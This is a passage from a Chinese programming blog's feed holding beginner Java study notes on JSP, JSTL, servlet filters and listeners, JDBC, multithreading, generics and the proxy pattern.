</ul>
<p><strong>内置对象</strong></p>
<pre><code class="language-java line-numbers">final javax.servlet.jsp.PageContext pageContext; 页面上下文
javax.servlet.http.HttpSession session1 = null; session
final javax.servlet.ServletContext application; applicationContext
final javax.servlet.ServletConfig config; config
javax.servlet.jsp.JspWriter out = null; out 
final java.lang.Object page = this; page 当前
HttpServletRequest request  请求
HttpServletResponse response 响应
</code></pre>
<ul>
<li>maven依赖</li>
</ul>
<p><strong>JSTL表达式依赖</strong></p>
<pre><code class="language-java line-numbers">&lt;dependency&gt;
    &lt;groupId&gt;javax.servlet.jsp.jstl&lt;/groupId&gt;
    &lt;artifactId&gt;jstl-api&lt;/artifactId&gt;
    &lt;version&gt;1.2&lt;/version&gt;
&lt;/dependency&gt;
</code></pre>
<p><strong>standard标签库</strong></p>
<pre data-language=XML><code class="language-markup line-numbers">&lt;dependency&gt;
    &lt;groupId&gt;taglibs&lt;/groupId&gt;
    &lt;artifactId&gt;standard&lt;/artifactId&gt;
    &lt;version&gt;1.1.2&lt;/version&gt;
&lt;/dependency&gt;
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20201002165412.png" alt="" /></p>
<h3>JSP基础语法和指令</h3>
<ul>
<li>Tomcat热部署</li>
</ul>
<pre><code class="line-numbers">https://blog.csdn.net/jc0803kevin/article/details/88579109
</code></pre>
<ul>
<li>Jsp表达式</li>
</ul>
<pre><code class="line-numbers">&lt;%--jsp表达式，用来将程序的输出，输出到客户端--%&gt;
&lt;%--&lt;%= 变量或表达式%&gt;--%&gt;
&lt;%= new java.util.Date()%&gt;
</code></pre>
<ul>
<li>jsp脚本片段</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%

    int sum = 0;
    for (int i = 0; i &lt; 100; i++) {
        sum+=1;
    }

    out.println ("&lt;h1&gt;sum="+sum+"&lt;/h1&gt;");
%&gt;
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20201002175313.png" alt="" /></p>
<ul>
<li>jso声明</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%!

    static {
        System.out.println ("Loading Servlet");
    }

    private int globalVar = 0;

    public void test(){
        System.out.println ("进入了方法test");
    }
%&gt;
</code></pre>
<p><strong>jsp声明会被编译到JSP生成的java的类中，其他的会被生成到_jspServlet方法中</strong></p>
<h3>JSP指令</h3>
<ul>
<li>定制错误页面</li>
</ul>
<p><strong><%@page args...%></strong></p>
<pre><code class="line-numbers">&lt;%@page errorPage="err/err.html" %&gt;
</code></pre>
<ul>
<li>文件包含</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%@include file="index.jsp"%&gt;
&lt;jsp:include page="index.jsp"&gt;
</code></pre>
<h3>JSP内置对象及作用域</h3>
<ul>
<li>9大内置对象</li>
</ul>
<pre><code class="line-numbers">PageContext  存东西
Request  存东西
Response
Session
Application  [ServletContext] 存东西
config  [ServletConfig]
out
page
exception
</code></pre>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers"> pageContext.setAttribute("name1","syst1m1");  //一个页面中有效
 request.setAttribute("name2","syst1m2"); //一个请求中有效
 session.setAttribute("name3"."syst1m3"); //一个会话中有效
 application.setAttribute("name4"."syst1m4"); //保存的数据在服务器中中有效
</code></pre>
<ul>
<li>通过寻找的方式获取</li>
</ul>
<pre><code class="line-numbers">pageContext.findAttribute();
</code></pre>
<ul>
<li>重定向</li>
</ul>
<pre><code class="line-numbers">pageContext.forward()
</code></pre>
<h3>Jsp、JSTL标签、EL表达式</h3>
<h4>EL表达式</h4>
<ul>
<li>el表达式 ${}</li>
</ul>
<p><strong>获取数据</strong></p>
<pre><code class="line-numbers">${标识符}
</code></pre>
<p><strong>执行运算</strong><br />
<strong>获取web开发的常用对象</strong></p>
<h4>jsp标签</h4>
<pre><code class="language-java line-numbers">&lt;jsp:forward page="test.jsp"&gt;
    &lt;jsp:param name="paramtest" value="test"/&gt;
&lt;/jsp:forward&gt;
</code></pre>
<h4>JSTL表达式</h4>
<h5>核心标签</h5>
<ul>
<li>引入JSTL核心标签库</li>
</ul>
<pre><code class="line-numbers">&lt;%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %&gt;
</code></pre>
<ul>
<li>set标签：将值保存在指定的作用域中</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%-- var="变量名"  value="值" scope="保存在哪个作用域（page、request、session、application）"--%&gt;
&lt;c:set var="userName" value="yzq" scope="page"&gt;&lt;/c:set&gt;
&lt;span&gt;${userName}&lt;/span&gt;&lt;%--配合EL表达式取值--%&gt;
</code></pre>
<ul>
<li>out标签：将结果输出</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%--取值--%&gt;
&lt;c:out value="${userName}"&gt;&lt;/c:out&gt;
</code></pre>
<ul>
<li>if标签：判断</li>
</ul>
<pre><code class="language-java line-numbers">&lt;c:if test="${age&gt;20}"&gt;

    &lt;span&gt;奔三的人了&lt;/span&gt;

&lt;/c:if&gt;
</code></pre>
<ul>
<li>choose：选择，跟java中的switch语句类似</li>
</ul>
<pre><code class="language-java line-numbers">&lt;c:set var="age" scope="page" value="40"&gt;&lt;/c:set&gt;
&lt;c:choose&gt;

    &lt;%--符合该条件时执行--%&gt;
    &lt;c:when test="${age&gt;20&amp;&amp;age&lt;30}"&gt;
        &lt;span&gt;奔三的人了&lt;/span&gt;
    &lt;/c:when&gt;

    &lt;%--符合该条件时执行--%&gt;
    &lt;c:when test="${age&lt;20}"&gt;
        &lt;span&gt;还是小鲜肉&lt;/span&gt;

    &lt;/c:when&gt;

    &lt;%--之前条件都不满足时，执行这个--%&gt;
    &lt;c:otherwise&gt;

        &lt;span&gt;可以考虑养生了&lt;/span&gt;

    &lt;/c:otherwise&gt;
&lt;/c:choose&gt;
</code></pre>
<ul>
<li>forEach标签：用于迭代集合</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%--迭代标签 用于迭代集合--%&gt;
&lt;c:forEach items="${users}" var="user"&gt;

    &lt;span&gt;${user.name}&lt;/span&gt;:&lt;span&gt;${user.age}&lt;/span&gt;
    &lt;br&gt;

&lt;/c:forEach&gt;
</code></pre>
<h3>JavaBean</h3>
<p><strong>一般用来与数据库的字段做映射</strong></p>
<h4>code</h4>
<ul>
<li>javabean.java</li>
</ul>
<pre><code class="language-java line-numbers">package com.bean.pojo;

public class People {

    private int id;
    private String name;
    private int age;
    private String address;

    public People() {
    }

    public People(int id, String name, int age, String address) {
        this.id = id;
        this.name = name;
        this.age = age;
        this.address = address;
    }

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getAddress() {
        return address;
    }

    public void setAddress(String address) {
        this.address = address;
    }

    @Override
    public String toString() {
        return "People{" +
                "id=" + id +
                ", name='" + name + ''' +
                ", age=" + age +
                ", address='" + address + ''' +
                '}';
    }
}
</code></pre>
<ul>
<li>javabean.jsp</li>
</ul>
<pre><code class="language-java line-numbers">&lt;jsp:useBean id="people" class="com.javabean.pojo.People" scope="page"/&gt;
&lt;jsp:setProperty name="people" property="address" value="北京"&gt;&lt;/jsp:setProperty&gt;
&lt;jsp:getProperty name="people" property="address"/&gt;
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20201009164549.png" alt="" /></p>
<h3>过滤器Filter</h3>
<ul>
<li>编写Servlet</li>
</ul>
<pre><code class="language-java line-numbers">public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
         resp.getWriter ().write ("你好呀，世界");
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}
</code></pre>
<ul>
<li>编写Filter</li>
</ul>
<pre><code class="language-java line-numbers">public class encodeing implements Filter {
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        servletRequest.setCharacterEncoding ("utf-8");
        servletResponse.setCharacterEncoding ("utf-8");
        servletResponse.setContentType ("text/html;charset=UTF-8");
        System.out.println ("过滤器执行前");
        filterChain.doFilter (servletRequest,servletResponse);
        System.out.println ("过滤器执行后");
    }

    public void destroy() {

    }
}
</code></pre>
<ul>
<li>注册Filter</li>
</ul>
<pre data-language=XML><code class="language-markup line-numbers">&lt;filter&gt;
    &lt;filter-name&gt;encode&lt;/filter-name&gt;
    &lt;filter-class&gt;encodeing&lt;/filter-class&gt;
  &lt;/filter&gt;
  &lt;filter-mapping&gt;
    &lt;filter-name&gt;encode&lt;/filter-name&gt;
    &lt;url-pattern&gt;/*&lt;/url-pattern&gt;
  &lt;/filter-mapping&gt;
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201010210744.png" alt="" /></p>
<h3>监听器</h3>
<h4>统计在线人数Demo</h4>
<ul>
<li>index.jsp</li>
</ul>
<pre><code class="language-java line-numbers">&lt;html&gt;
&lt;body&gt;
&lt;h2&gt;Hello World!&lt;/h2&gt;


&lt;h1&gt;当前有&lt;span&gt;&lt;%=this.getServletConfig().getServletContext().getAttribute("OnlineCount")%&gt;&lt;/span&gt;&lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>OnlineCount</li>
</ul>
<pre><code class="language-java line-numbers">@Override
    public void sessionCreated(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (1);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count+1);
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

    //销毁session监听
    @Override
    public void sessionDestroyed(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (0);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count-1);
            httpSessionEvent.getSession ().invalidate ();
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

</code></pre>
<ul>
<li>注册监听器</li>
</ul>
<pre data-language=XML><code class="language-markup line-numbers">&lt;listener&gt;
    &lt;listener-class&gt;OnlineCount&lt;/listener-class&gt;
&lt;/listener&gt;
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201011114449.png" alt="" /></p>
<h2>JDBC(Java fatabase connect)</h2>
<h3>JDBC</h3>
<pre><code class="language-java line-numbers">package com.jdbc4;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Timestamp;
import java.util.Date;

public class TestUpdate {

  /**
   * @param args
   */
  public static void main(String[] args) {
    Connection conn=null;
    try {
      Class.forName("com.mysql.jdbc.Driver");
      //建立连接  ctrl+shfit +o
      conn=DriverManager.getConnection("jdbc:mysql://localhost/test?useUnicode=true&amp;characterEncoding=utf-8", "root", "19810109");
      String sql="update book set title=?,price=?,birth=?,publish_date=?,update_date=? where id=?";
      //预编译
      PreparedStatement pstmt=conn.prepareStatement(sql);
      pstmt.setString(1, "四集");
      pstmt.setFloat(2, 50.55f);
      pstmt.setDate(3, new java.sql.Date(new Date().getTime()));
      pstmt.setTimestamp(4, new Timestamp(new Date().getTime()));
      pstmt.setTimestamp(5, new Timestamp(new Date().getTime()));
      pstmt.setInt(6, 1);

      //执行
      pstmt.executeUpdate();
    } catch (Exception e) {
      e.printStackTrace();
    }
    finally
    {
      try {
        conn.close();
      } catch (SQLException e) {
        e.printStackTrace();
      }
    }
  }

}

</code></pre>
<h3>JDBC事务</h3>
<pre><code class="language-java line-numbers">connection.setAutoCommit(false) 开启事务
</code></pre>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Java学习入门之多线程</title>
		<link>/code/1962.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Sun, 11 Oct 2020 07:30:13 +0000</pubDate>
				<category><![CDATA[编程学习]]></category>
		<guid isPermaLink="false">/?p=1962</guid>

					<description><![CDATA[Java多线程 继承Thread类 public class Threadtest extends Thread { /** * * 多线程学习 * **/ @Override p...]]></description>
										<content:encoded><![CDATA[<h1>Java多线程</h1>
<ul>
<li>继承Thread类</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest extends Thread {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i &lt; 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        test.start();
        for (int i = 0; i &lt; 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907110727.png" alt="" /></p>
<ul>
<li>实现Runnable接口</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest implements Runnable {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i &lt; 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        new Thread(test).start();

        for (int i = 0; i &lt; 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }


}

</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907113426.png" alt="" /></p>
<ul>
<li>龟兔赛跑</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private static String winner;

    @Override
    public void run(){
        for (int i = 0; i &lt;= 100; i++) {
            if(Thread.currentThread().getName().equals("兔子")&amp;&amp; 1%10 ==0){
                try{
                    Thread.sleep(10);
                }catch (InterruptedException e){
                    e.printStackTrace();
                }
            }

            boolean flag = gameover(i);

            if ((flag)) {
                break;
            }

            System.out.println(Thread.currentThread().getName()+"跑了"+i+"步");
        }
    }

    private boolean gameover(int steps){
        if(winner!=null){
            return true;
        }{
            if(steps&gt;=100){
                winner = Thread.currentThread().getName();
                System.out.println("winner is"+winner);
            }
        }

        return false;
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();
        new Thread(test,"兔子").start();
        new Thread(test,"乌龟").start();
    }


}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907160554.png" alt="" /></p>
<ul>
<li>线程停止（建议使用标志位）</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private boolean flag = true;

    @Override
    public void run(){
        int i =0;
        while (flag){
            System.out.println("run...Thread"+i++);
        }
    }

    public void stop(){
        this.flag = false;
    }


    public static void main(String[] args) {
        Threadtest test = new Threadtest();
        new Thread(test).start();

        for (int i = 0; i &lt; 1000; i++) {
            System.out.println("main"+i);

            if(i==900) {
                test.stop();
                System.out.println("子线程停止");
            }
        }
    }

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907171634.png" alt="" /></p>
<ul>
<li>线程休眠</li>
</ul>
<pre><code class="language-java line-numbers">Thread.sleep(1000)
</code></pre>
<ul>
<li>线程礼让（yield）</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest implements Runnable {


    private boolean flag = true;

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"线程开始执行");
        Thread.yield();
        System.out.println(Thread.currentThread().getName()+"线程停止执行");
    }

    public static void main(String[] args) {
        Threadtest test = new Threadtest();

        new Thread(test,"a").start();
        new Thread(test,"b").start();
    }

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907174748.png" alt="" /></p>
<ul>
<li>线程强制执行(join)</li>
</ul>
<pre><code class="language-java line-numbers">public class Threadtest implements Runnable {


    @Override
    public void run(){
        for (int i = 0; i &lt; 1000; i++) {
            System.out.println("线程vipl来了"+i);
        }
    }

    public static void main(String[] args) throws InterruptedException{

        Threadtest test = new Threadtest();
        Thread thread = new Thread(test);
        thread.start();

        for (int q = 0; q &lt; 500; q++) {
            if(q==200){
                thread.join();
            }
            System.out.println("main"+q);
        }
    }

}

</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907191302.png" alt="" /></p>
<ul>
<li>线程优先级</li>
</ul>
<p><strong>优先级只是意味着获得调度的概率低，并不是优先级低就不会被调用，顺序也是概率高，顺序可能也是不同的，全看CPU的调度</strong></p>
<pre><code class="language-java line-numbers">public class Threadtest {


    public static void main(String[] args) throws InterruptedException{

        //主线程默认优先级
        System.out.println(Thread.currentThread().getName()+"----&gt;"+Thread.currentThread().getPriority());

        MyPriority MyPriority = new MyPriority();

        Thread t1= new Thread(MyPriority);
        Thread t2= new Thread(MyPriority);
        Thread t3= new Thread(MyPriority);

        //设置优先级

        t1.start();
        t2.setPriority(6);
        t2.start();
        t3.setPriority(Thread.MAX_PRIORITY);
        t3.start();
    }

}

class MyPriority implements Runnable{

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"----&gt;"+Thread.currentThread().getPriority());
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907194216.png" alt="" /></p>
<ul>
<li>守护线程</li>
</ul>
<pre><code class="language-java line-numbers">public class TestDaemon {

    /**
     * 测试守护线程
     * **/

    public static void main(String[] args) throws InterruptedException{

        god god = new god();
        Y4er Y4er = new Y4er();

         Thread thread = new Thread(god);
        thread.setDaemon(true);
        thread.start();

        new Thread(Y4er).start();

    }

}


class god implements Runnable{

    @Override
    public void run(){
        while (true){
            System.out.println("上帝保佑着你");
        }
    }
}
class Y4er implements Runnable{

    @Override
    public void run(){
        for (int i = 0; i &lt; 36500; i++) {
            System.out.println("开心的活着");
        }

        System.out.println("Googbyg world");
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200907195704.png" alt="" /></p>
<ul>
<li>线程同步</li>
</ul>
<p><strong>锁机制</strong></p>
<pre><code class="line-numbers">synchronized(放置于资源竞争处)
</code></pre>
<p><strong>同步方法</strong></p>
<pre><code class="line-numbers">private synchronized void buy(){xx}
</code></pre>
<p><strong>同步块</strong></p>
<pre><code class="language-java line-numbers">synchronized(Obj){}
</code></pre>
<ul>
<li>死锁</li>
</ul>
<pre><code class="language-java line-numbers">public class DeadLock {

    public static void main(String[] args) {

        Makeup g1= new Makeup(0,"灰姑娘");
        Makeup g2= new Makeup(1,"白雪公主");
        g1.start();
        g2.start();
    }
}

//口红
class LipStick{}

//镜子

class Mirror{}

class Makeup extends Thread{

    static LipStick lipStick = new LipStick();
    static Mirror mirror = new Mirror();

    int choice;
    String girlName;

    Makeup(int choice,String girlName){
        this.choice = choice;
        this.girlName = girlName;
    }

    @Override
    public void run() {
        try {
            makeup();
        }catch (InterruptedException e){
            e.printStackTrace();
        }
    }

    private void makeup() throws InterruptedException{
        if(choice==0){
            synchronized (lipStick){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(mirror){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }else {
            synchronized (mirror){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(lipStick){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200908104512.png" alt="" /></p>
<ul>
<li>Lock锁</li>
</ul>
<pre><code class="language-java line-numbers">import java.util.concurrent.locks.ReentrantLock;

public class TestLock {

    public static void main(String[] args) {
        TestLock2 test = new TestLock2();
        new Thread(test).start();
        new Thread(test).start();
        new Thread(test).start();

    }
}


class TestLock2 implements Runnable{


    int ticketNums = 10;

    private final ReentrantLock lock = new ReentrantLock();

    @Override
    public void run() {
        while(true){
            try{
                lock.lock();

                if(ticketNums&gt;0){
                    try{
                        Thread.sleep(1000);
                    }catch (InterruptedException e){
                        e.printStackTrace();
                    }
                    System.out.println(ticketNums--);
                }else {
                    break;
                }
            }finally {
                lock.unlock();
            }
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200908113804.png" alt="" /></p>
<h2>线程协作（生产者与消费者问题）</h2>
<p><img src="/wp-content/uploads/2020/10/20200908114642.png" alt="" /></p>
<h3>管程法</h3>
<pre><code class="language-java line-numbers">/**
 *
 *测试生产者消费者模型-》利用缓冲区解决：管程法
**/

//生产者，消费者，产品，缓冲区
public class TestPC {

    public static void main(String[] args) {
        SynContainer container = new SynContainer();

        new Productor(container).start();
        new Consumer(container).start();
    }
}


//生产者

class Productor extends Thread{

    SynContainer container;
    public Productor(SynContainer container){
        this.container = container;
    }

    //生产


    @Override
    public void run() {
        for (int i = 0; i &lt; 100; i++) {
            System.out.println("生产了"+i+"只鸡");
            container.push(new Chicken(i));
        }
    }
}


//消费者
class Consumer extends Thread{
    SynContainer container;

    public Consumer(SynContainer container){
        this.container = container;
    }

    //消费


    @Override
    public void run() {
        for (int i = 0; i &lt; 100; i++) {
            System.out.println("消费了第"+container.pop().id+"只鸡");
        }
    }
}

//产品

class Chicken{
    int id; //产品编号

    public Chicken(int id) {
        this.id = id;
    }
}

//缓冲区

class SynContainer{

    //需要一个容器大小

    Chicken[] chickens = new Chicken[10];

    //容器计数器

    int count = 0;
    //生产者放入产品

    public synchronized void push(Chicken chicken){

        //如果容器满了，就需要等待消费者消费
        if(count==chickens.length){
            //通知消费者消费，生产等待

            try{
                this.wait();
            }catch (InterruptedException e ){
                e.printStackTrace();
            }
        }
        //荣国没有满，就需要丢入产品
        chickens[count]=chicken;
        count++;

        //可以通知消费者消费了

        this.notifyAll();
    }

    //消费者消费产品

    public synchronized Chicken pop(){
        //判断能否消费

        if(count==0){
            //等待生产者生产，消费者等待
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }

        }

        //如果可以消费
        count--;
        Chicken chicken = chickens[count];

        //吃完了，通知生产者生产
        this.notifyAll();
        return chicken;
    }

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200908123759.png" alt="" /></p>
<h3>信号灯法(设置标志位)</h3>
<pre><code class="language-java line-numbers">public class TestPc2 {

    public static void main(String[] args) {

        TV tv = new TV();

        new Player(tv).start();
        new Watcher(tv).start();
    }
}


//生产者-〉演员

class Player extends Thread{
    TV tv;
    public Player(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i &lt; 20; i++) {
            if(i%2==0){
                this.tv.play("快乐大本营");
            }else {
                this.tv.play("抖音，记录美好生活");

            }        }
    }
}

//消费者-〉观看

class Watcher extends Thread{
    TV tv;
    public Watcher(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i &lt; 20; i++) {
            tv.watch();
        }
    }
}

//产品-&gt;节目

class TV{
    //演员表演，观众等待
    //观众观看，演员等待

    String voice;
    boolean flag = true;

    //表演

    public synchronized void play(String voice){

        if(!flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();

            }
        }        System.out.println("演员表演了:"+voice);

        this.notifyAll();
        this.voice = voice;
        this.flag = !this.flag;
    }

    //观看


    public synchronized void watch(){

        if(flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }
        }

        System.out.println("观看了"+voice);

        //通知演员表演

        this.notifyAll();
        this.flag = !this.flag;

    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200908131618.png" alt="" /></p>
<h2>线程池</h2>
<pre><code class="language-java line-numbers">import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

/**
 * 测试线程池
 * **/
public class TestPool {
    public static void main(String[] args) {
        ExecutorService service = Executors.newFixedThreadPool(10);

        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());

    }

}


class MyThread implements Runnable{

    @Override
    public void run() {
        for (int i = 0; i &lt; 100; i++) {
            System.out.println(Thread.currentThread().getName()+i);
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200908133136.png" alt="" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Java学习入门之JavaSe泛型、代理、注解与反射</title>
		<link>/code/1940.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Sun, 11 Oct 2020 07:26:27 +0000</pubDate>
				<category><![CDATA[编程学习]]></category>
		<guid isPermaLink="false">/?p=1940</guid>

					<description><![CDATA[泛型 泛型，参数化类型，分为泛型类、接口、方法 泛型类 class 类名称 &#60;泛型标识&#62; { private 泛型标识 var; ... } 泛型接口 public c...]]></description>
										<content:encoded><![CDATA[<h2>泛型</h2>
<ul>
<li>泛型，参数化类型，分为泛型类、接口、方法</li>
</ul>
<h3>泛型类</h3>
<pre><code class="line-numbers">class 类名称 &lt;泛型标识&gt; {
    private 泛型标识 var;
    ...
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200829221407.png" alt="" /></p>
<h3>泛型接口</h3>
<pre><code class="line-numbers">public class chabug {
    public static void main(String[] args) {
        new testa().next();
    }

}

interface test&lt;T&gt;{
    public T next();
}

class testa implements test&lt;String&gt;{
    private String[] b  = new String[]{"a","b","c","d"};
    @Override
    public String next(){
        Random rand = new Random();
        System.out.println(b[rand.nextInt(3)]);
        return null;
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200829222427.png" alt="" /></p>
<h3>泛型方法</h3>
<pre><code class="line-numbers">public class chabug {
    public static void main(String[] args) {
        out("28");
        out("永远滴神");
    }

    public static &lt;T&gt; void out(T t) {
        System.out.println(t);
    }
}

</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830124017.png" alt="" /></p>
<h3>泛型通配符</h3>
<pre><code class="line-numbers">public void showKeyValue1(Generic&lt;?&gt; obj){
    Log.d("泛型测试","key value is " + obj.getKey());
}
</code></pre>
<h3>泛型上下边界</h3>
<ul>
<li>在使用泛型的时候，我们还可以为传入的泛型类型实参进行上下边界的限制，如：类型实参只准传入某种类型的父类或某种类型的子类。为泛型添加上边界，即传入的类型实参必须是指定类型的子类型,泛型的上下边界添加，必须与泛型的声明在一起.</p>
</li>
<li>
<p>常规例子（会提示类型无法转换）</p>
</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200829231117.png" alt="" /></p>
<ul>
<li>使用上下边界</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200829231228.png" alt="" /></p>
<ul>
<li>疑惑</li>
</ul>
<pre><code class="line-numbers">GenericHolder&lt;Fruit&gt; fruitHolder = new GenericHolder&lt;Fruit&gt;()
</code></pre>
<p>为何意思</p>
<p>解决：</p>
<pre><code class="line-numbers">Fruit fruit = new Fruit("水果");
fruitHolder.setObj(fruit)
</code></pre>
<p><strong>先实例化再传入对象，参考如下：</strong></p>
<p><a class="wp-editor-md-post-content-link" href="https://www.imooc.com/article/26009">Java泛型再探——泛型通配符及上下边界</a></p>
<h3>泛型数组</h3>
<ul>
<li>不可以</li>
</ul>
<pre><code class="line-numbers">List&lt;String&gt;[] ls = new ArrayList&lt;String&gt;[10];  
</code></pre>
<ul>
<li>可以</li>
</ul>
<pre><code class="line-numbers">List&lt;?&gt;[] ls = new ArrayList&lt;?&gt;[10]; 
List&lt;String&gt;[] ls = new ArrayList[10];
</code></pre>
<h2>代理</h2>
<p><img src="/wp-content/uploads/2020/10/20200830162847.png" alt="" /></p>
<h3>静态代理</h3>
<p>抽象角色：一般会使用接口或抽象类来解决<br />
真实角色：被代理的角色<br />
代理角色：代理真实角色后，我们一般会做一些附属操作<br />
客户：访问代理对象的人</p>
<ul>
<li>抽象角色</li>
</ul>
<pre><code class="line-numbers">//接口——》租房
public interface Rent {

    public void rent();
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830165257.png" alt="" /></p>
<ul>
<li>真实角色</li>
</ul>
<pre><code class="line-numbers">//真实角色-&gt;房东
public class Host implements Rent{
    @Override
    public void rent(){
        System.out.println("房东要出租房子");
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830165318.png" alt="" /></p>
<ul>
<li>代理角色</li>
</ul>
<pre><code class="line-numbers">package ChaBugStudy;

public class Proxy implements Rent{

      private Host host;

      public Proxy(){

      }
      public Proxy(Host host){
          this.host = host;
      }

      public void rent(){
            seeHouse();
            host.rent();
            hetong();
            fare();
      }

      //看房

      public void seeHouse(){
            System.out.println("中介带你看房");
      }

      public void hetong(){
            System.out.println("签合同吧！");
      }
      //收中介费

      public void fare(){
            System.out.println("这房子不错，阔绰的你决定给点小费");
      }

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830170321.png" alt="" /></p>
<ul>
<li>客户端访问代理角色</li>
</ul>
<pre><code class="line-numbers">public class Clinet {

    public static void main(String[] args) {
        Host host = new Host();
        Proxy proxy = new Proxy(host);

        proxy.rent();
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830170342.png" alt="" /></p>
<ul>
<li>运行一下看看效果</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200830170453.png" alt="" /></p>
<ul>
<li>缺点</li>
</ul>
<p><strong>一个真实对象需要产生一个代理</strong></p>
<h3>动态代理（先留着看完反射再看）</h3>
<ul>
<li>动态代理（这里是基于JDK动态代理）</li>
</ul>
<p><strong>一个动态代理类可以代理多个类，只要是实现了同一个接口</strong></p>
<ul>
<li>抽象角色</li>
</ul>
<pre><code class="line-numbers">public interface Rent {

   public void rent();
}
</code></pre>
<ul>
<li>真实角色</li>
</ul>
<pre><code class="line-numbers">public class Host implements Rent{

    public void rent(){
        System.out.println("房东要出租房子！");
    }
}
</code></pre>
<ul>
<li>代理角色</li>
</ul>
<pre><code class="line-numbers">import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
